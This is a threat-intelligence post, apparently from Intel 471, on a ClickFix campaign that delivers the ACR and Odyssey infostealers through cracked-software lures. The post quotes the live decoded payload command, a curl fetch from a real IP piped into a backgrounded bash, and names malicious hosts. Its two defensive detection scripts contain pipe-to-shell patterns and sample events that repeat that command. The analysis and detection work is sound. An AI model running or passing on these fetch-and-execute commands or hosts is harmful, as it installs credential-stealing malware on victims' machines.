Cybercriminals need steady streams of fresh credentials, personal data and financial data to carry out fraud and other kinds of online schemes. The collector of this data is often malicious software, or malware, which infects end-user computers and vacuums up large amounts of data. The data ends up on underground markets such as the Russian Market, where it is sold to other actors in tranches called “logs.” But the first step is landing malware on a person’s computer, and a social-engineering technique dubbed “ClickFix” has been increasingly seen over the last year to accomplish this. ClickFix typically involves tricking a user into copying a command or script and entering it into the command line on a Windows or macOS machine. The script usually leads to the downloading of malware.
Despite seeming to be a ham-fisted attempt to get unsuspecting users to willingly install malware, it has been extraordinarily successful, so much so that advanced persistent threat (APT) actors are using it as well as financially motivated cybercriminals. Microsoft found ClickFix was the most common initial access scheme in its 2025 Digital Defense Report, representing 47% of all initial access methods. ClickFix has been successful for a few reasons. One is that ClickFix threats are usually not coming through email, which means email security solutions are out of the loop. Users come across ClickFix schemes through organic web searches that return malicious pages, as well as direct messages through social platforms and comments on videos. Anti-phishing and browser security firm Push Security notes in a recent blog that the malicious script is copied inside browser sandboxes, which means other security tools don’t see it. Microsoft writes that the commands “pull malicious payloads directly into memory—a clean, fileless process that is often invisible to traditional security tools.” Once run, it’s up to endpoint detection and response (EDR) software to catch it, which Push Security posits is the last line of defense.
In this blog post, we will analyze a malware campaign that used ClickFix in an infection chain that targeted both Windows and macOS users with information-stealing malware, known as infostealers. This campaign hinged on attracting users who had conducted searches for “cracked” software, the term for software whose copyright protections have been circumvented. This is a tried-and-true lure for attracting potential victims.
In June 2025, we did something no one should do: We conducted a proactive search for cracked software in hopes of finding malware. It didn’t take long, and our Malware Intelligence Team uncovered a new wave of bogus software malware distribution campaigns. Because direct links to servers hosting malware, such as those on bulletproof hosting (BPH) services (see our blog “Bulletproof hosting: A critical cybercriminal service”), are often blocked, threat actors will use a series of hop points less likely to be blocked before the malicious link or script is delivered. In the observed campaign, search results led to landing pages on Google-hosted services, such as Colab, Drive, Looker Studio, Sites and Groups. These pages are then used to direct users to secondary landing pages. Attackers do this because it’s less likely that Google services will be outright blocked by administrators.
These pages also act as filters. Depending on the visitor’s operating system (OS), victims were directed to infostealers for either Windows or macOS machines. Windows users were funneled to a tape archive (.tar) containing the ACR aka Acreed stealer on the MEGA file-hosting service. macOS users were directed down a different path to a webpage that mimics a legitimate Cloudflare security check. The next step was the ClickFix trick, which, if the user complied, led to the download and execution of the Odyssey macOS stealer, a variation of the Poseidon stealer (see below).
The image depicts the infection chain leveraged to deploy the ACR and Odyssey information stealers June 25, 2025.
There are indications that the malware campaigns were successful in capturing voluminous amounts of data. In early June 2025, we noted 133,980 new ACR stealer logs uploaded to the Russian Market in May alone — a nearly 700% increase from the previous month. This surge indicated the malware was being distributed through highly effective campaigns such as the one we observed that use the same lure infrastructure to infect Windows and macOS users. This report highlights examples of both the ACR and Odyssey stealers and examines their associated campaigns and payloads.
We first discovered the campaign through proactive searches for cracked software, using queries such as “download free cracked software for Windows site:google.com” and “download free cracked software 2025 site:google.com.” Reviewing several top results on a Windows host ultimately led to the download of the ACR infostealer, which targets Windows users.
The image depicts a screenshot of a Google search leading to the download of the ACR information stealer June 20, 2025.
In the image above, we can see a search result for a purported software crack for the virtual private network (VPN) product NordVPN. When a user clicks the search result, they are routed to a Google Colab development environment with a "Download Link" button.
Selecting this button redirects to a webpage where a “Download Now” button appears.
The image depicts a screenshot of a website leading to the download of the ACR information stealer June 20, 2025.
Pressing that button opens an intermediary page instructing the victim to copy and paste a MEGA URL into the browser. Following this link finally reaches the MEGA page hosting a .tar archive (see two figures below).
The image depicts an intermediary page instructing the victim to copy and paste a MEGA URL into the browser June 20, 2025.
The image depicts the MEGA page hosting the initial ZIP archive June 20, 2025.
The downloaded .tar file contains a password-protected ZIP archive (SETUP.zip). Extracting this archive reveals an executable file (setup.exe), which we confirmed contained the ACR stealer payload. ACR does not act only as an infostealer, however. It has also been employed as a “loader,” which is the name for a piece of malware that is used to download other follow-on malware to a machine. We observed ACR used as a loader to install cryptocurrency “clipper” malware that we dubbed SharkClipper based on the file name in the download URLs and various strings. Clippers monitor a user’s clipboard for cryptocurrency addresses and replace copied addresses with ones the attackers control. Users unwittingly copy the adversary addresses when making a transaction, losing control of their cryptocurrency.
When we tested the same NordVPN crack link on macOS, the initial redirect from Google Colab still led to https://drapk.net/after-verification-click-go-to-download-page/, but clicking the “Download Now” button no longer triggered a second redirect. Instead, the user was shown a webpage that mimics a legitimate Cloudflare security check page at https://apposx.com/index2.php, which instructs them to run a ClickFix command.
The image depicts a fake Cloudflare security check which prompts users to run a ClickFix command June 20, 2025.
What is presented as the string to copy is not actually what is copied. Instead, the clipboard receives a Base64-encoded shell command that, when decoded, is a curl command that fetches a payload and pipes it into a shell that keeps running in the background:
curl -s http://45.135.232.33/d/roberto39774 | nohup bash &
Examining the “roberto39774” AppleScript confirmed the Odyssey infostealer was hosted on that IP address June 23, 2025.
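The clipboard substitution described above is the point a defender most wants to inspect before anything is pasted into a terminal. The script below is an added example for this post, not code from the original report or from Intel 471’s tooling: it takes a string as a ClickFix page would place it on the clipboard, expands any Base64 layers, and reports whether the real command fetches a URL and pipes it into a shell that is left running in the background. The sample clipboard string is constructed here from the command shape shown above, with an RFC 5737 documentation address standing in for the real host, and the `echo <b64> | base64 -d | bash` wrapper is an assumed delivery form rather than one quoted from the campaign.

```python
"""Reveal what a ClickFix clipboard string really runs before anyone pastes it."""
import base64
import binascii
import re
import string
from dataclasses import dataclass, field

# A Base64 run long enough to be an encoded command rather than an ordinary word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")
# A download tool whose output is piped straight into an interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(nohup\s+)?(ba|z)?sh\b")
# Ways to keep the fetched script running after the terminal window is closed.
BACKGROUND = re.compile(r"&\s*$|\bnohup\b|\bdisown\b", re.MULTILINE)
PRINTABLE = set(string.printable)


@dataclass
class Finding:
    decoded: str            # the command with Base64 layers expanded
    encoded: bool           # True if at least one layer was hidden behind Base64
    urls: list = field(default_factory=list)
    pipes_to_shell: bool = False
    backgrounded: bool = False
    suspicious: bool = False


def _decode_token(token):
    """Decode one token if it is valid Base64 for printable text, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and set(text) <= PRINTABLE else None


def decode_layers(text, max_depth=3):
    """Expand Base64 tokens in place, repeating for nested encodings."""
    for _ in range(max_depth):
        replaced = False
        for token in sorted(set(B64_TOKEN.findall(text)), key=len, reverse=True):
            decoded = _decode_token(token)
            if decoded is not None:
                text = text.replace(token, decoded)
                replaced = True
        if not replaced:
            break
    return text


def analyze_clipboard(clip):
    """Classify a clipboard string the way a paste guard or an analyst would."""
    decoded = decode_layers(clip)
    finding = Finding(decoded=decoded, encoded=decoded != clip)
    finding.urls = URL_RE.findall(decoded)
    finding.pipes_to_shell = bool(PIPE_TO_SHELL.search(decoded))
    finding.backgrounded = bool(BACKGROUND.search(decoded))
    # Fetch-and-execute is damning on its own; a URL hidden behind an encoding layer is as well.
    finding.suspicious = finding.pipes_to_shell or (finding.encoded and bool(finding.urls))
    return finding


# Constructed sample (not captured from the campaign): the command shape reported
# in the post, with an RFC 5737 documentation address in place of the real host,
# wrapped in an assumed `echo <b64> | base64 -d | bash` delivery form.
HIDDEN_COMMAND = "curl -s http://198.51.100.10/d/roberto39774 | nohup bash &"
SAMPLE_CLIPBOARD = ("echo " + base64.b64encode(HIDDEN_COMMAND.encode()).decode()
                    + " | base64 -d | bash")

if __name__ == "__main__":
    result = analyze_clipboard(SAMPLE_CLIPBOARD)
    print("suspicious:", result.suspicious)
    print("really runs:", result.decoded)
    print("fetches:", result.urls)
```

The decoder only accepts a token as Base64 when it decodes to printable text, which keeps ordinary URL path fragments from being misread as encoded data, and it walks a few layers because ClickFix lures sometimes nest one encoding inside another.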
On execution, Odyssey collects user data, including passwords, cookies, cryptocurrency wallets, documents with particular file extensions, Apple Notes, Keychain entries and system metadata. It then compresses everything into “out.zip” and exfiltrates the archive via a POST request to the attacker-controlled server. The same IP hosted Odyssey’s control panel login page as seen below.
Since December 2024, we have been monitoring the volume of infostealer logs traded on the Russian Market, which sells logs from eight different malware families, including ACR. Tracking the number of logs for each stealer allows us to gauge activity levels and detect emerging cyber threat trends. A spike in logs tied to a particular stealer family often indicates a surge in distribution or reflects the success of ongoing campaigns.
ACR stealer was added to the Russian Market at the end of February 2025. Initially, the number of logs added was relatively modest. However, in May 2025, we observed a significant spike when 133,980 ACR logs were added, marking a whopping 690% increase compared to April 2025. Between June 1, 2025, and June 25, 2025, an additional 115,456 new logs were added, bringing the total number of ACR logs available on the Russian Market to 238,768.
The use of cracked software as a vector for malware distribution has long been a prevalent tactic within the cybercriminal landscape. While this strategy typically is associated with Windows-based malware, this particular campaign is noteworthy for its focus on macOS — a relatively novel target for such activities. Current trend analyses indicate the threat actors behind this campaign diversified their delivery mechanisms to enhance their reach across various platforms, distributing both ACR for Windows and Odyssey for macOS within a consolidated infrastructure.
This shift underscores a growing recognition among cybercriminals of the untapped potential within the macOS user base, particularly as more organizations increasingly integrate macOS into their operating environments. Many users operate under the misconception that macOS inherently is more secure due to the comparatively lower incidence of malware targeting the platform. This false sense of security renders them more susceptible to emerging threats since they tend to be less prepared for such campaigns.
Moving forward, it is imperative for organizations to reevaluate their endpoint security strategies to ensure macOS devices receive the same level of protection and monitoring as their Windows counterparts. This should include the deployment of cross-platform endpoint detection and response (EDR) software, the enforcement of strict application policies and the enhancement of user awareness regarding the inherent risks associated with the use of pirated software (see recommendations below).
Avoid using cracked software: Do not download or install cracked versions of software. These versions often contain malware that can compromise your system's security. Always use official and licensed software to receive the latest security updates and patches.
Implement strict software policies: Establish a strict policy against the use of unlicensed software. Utilize software inventory tools to monitor compliance and ensure all installed applications are licensed and updated properly.
Implement network security measures: Employ advanced network security tools, including firewalls and intrusion detection systems (IDSs), to protect against unauthorized access and detect and mitigate malicious activity.
Monitor process executions: Implement alerts for abnormal process chains that deviate from normal business operations to detect potential malware threats. Establish baseline behaviors to distinguish between legitimate activity and suspicious anomalies clearly.
Deploy indicators of compromise: Consider deploying the indicators of compromise (IoCs) available in our platform for timely detection of potential threats.
User education: Train users to exercise caution when downloading executable files from the internet.
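As an added example of the process-monitoring and IoC recommendations above (it is not from the report and is not Intel 471’s detection content), the script below walks a constructed set of process-start events, rebuilds each process’s ancestor chain, compares the chain with a small assumed baseline of known-good chains, and raises a high-severity alert when a command line pipes a download into a shell, detaches a shell with nohup, or references one of the IoCs named in this post (the two hosts and the IP address quoted above). The event records, their field names and the baseline are constructed for illustration and do not follow any particular EDR product’s schema.

```python
"""Flag suspicious process chains and IoC hits in process-start telemetry."""
import re

# IoCs named in the post: the fake Cloudflare page host, the redirect host and
# the Odyssey payload / control-panel address.
IOCS = ("apposx.com", "drapk.net", "45.135.232.33")

# Command-line patterns behind a ClickFix run: a download tool piped into a
# shell, and a shell detached from the terminal with nohup.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(nohup\s+)?(ba|z)?sh\b")
DETACHED_SHELL = re.compile(r"\bnohup\s+(ba|z)?sh\b")

# Assumed baseline of ancestor chains observed during normal use (constructed).
BASELINE_CHAINS = {
    ("launchd",),
    ("Terminal", "launchd"),
    ("zsh", "Terminal", "launchd"),
    ("make", "zsh", "Terminal", "launchd"),
}

# Constructed sample events (not real telemetry): a user pastes a ClickFix
# command into Terminal, alongside a normal build and a browser launch.
EVENTS = [
    {"pid": 100, "ppid": 0,   "name": "launchd",  "cmd": "/sbin/launchd"},
    {"pid": 200, "ppid": 100, "name": "Terminal",
     "cmd": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 300, "ppid": 200, "name": "zsh",      "cmd": "-zsh"},
    {"pid": 400, "ppid": 300, "name": "bash",
     "cmd": "bash -c 'curl -s http://45.135.232.33/d/roberto39774 | nohup bash &'"},
    {"pid": 500, "ppid": 400, "name": "curl",     "cmd": "curl -s http://45.135.232.33/d/roberto39774"},
    {"pid": 600, "ppid": 400, "name": "bash",     "cmd": "nohup bash"},
    {"pid": 700, "ppid": 300, "name": "make",     "cmd": "make -j4"},
    {"pid": 800, "ppid": 100, "name": "Safari",   "cmd": "/Applications/Safari.app/Contents/MacOS/Safari"},
]


def ancestor_chain(by_pid, pid):
    """Process name followed by its ancestors' names up to the root."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return names


def reasons_for(cmd):
    """Return the command-line findings for one event."""
    reasons = []
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("download tool piped into a shell")
    if DETACHED_SHELL.search(cmd):
        reasons.append("shell detached with nohup")
    reasons.extend(f"IoC match: {ioc}" for ioc in IOCS if ioc in cmd)
    return reasons


def evaluate(events, baseline=BASELINE_CHAINS):
    """High-severity alert on a finding; info alert on a chain outside the baseline."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestor_chain(by_pid, e["pid"])
        reasons = reasons_for(e["cmd"])
        if reasons:
            alerts.append({"pid": e["pid"], "severity": "high", "chain": chain, "reasons": reasons})
        elif tuple(chain) not in baseline:
            alerts.append({"pid": e["pid"], "severity": "info", "chain": chain,
                           "reasons": ["process chain not in baseline"]})
    return alerts


if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(a["severity"].upper(), a["pid"], " <- ".join(a["chain"]), "|", "; ".join(a["reasons"]))
```

The baseline check is what keeps the rule quiet on the developer’s `make` run from the same shell while still surfacing the unfamiliar Safari launch at low severity; in production the baseline would be learned from a period of normal telemetry rather than written by hand.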
This is an excerpt from a longer Malware Campaign Report from Intel 471’s Malware Intelligence Team that includes more technical information as well as detection and threat-hunting strategies. For more information, please contact Intel 471.